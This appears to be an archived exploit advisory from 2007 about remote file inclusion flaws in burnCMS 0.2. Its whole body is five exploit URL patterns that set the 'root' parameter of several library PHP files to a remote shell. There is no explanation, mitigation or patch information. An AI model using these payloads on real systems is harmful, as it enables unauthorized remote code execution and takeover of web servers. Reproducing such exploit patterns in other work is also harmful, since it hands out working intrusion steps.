id: 1802
date: 04/26/2007
title: burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

===========================================================
burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities
===========================================================


# burnCMS <= 0.2(root)Remote File Include Vulnerablities
# D.Script: http://www.burnstone.ch/downloads/burnCMS-0.2.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path_burnCMS]/lib/authuser.php?root=Shell
# Exploit:[Path_burnCMS]/lib/misc.php?root=Shell
# Exploit:[Path_burnCMS]/lib/connect.php?root=Shell
# Exploit:[Path_burnCMS]/lib/db/mysql.class.php?root=Shell
# Exploit:[Path_burnCMS]/lib/db/postgres.class.php?root=Shell




#  0day.today [2023-03-25]  #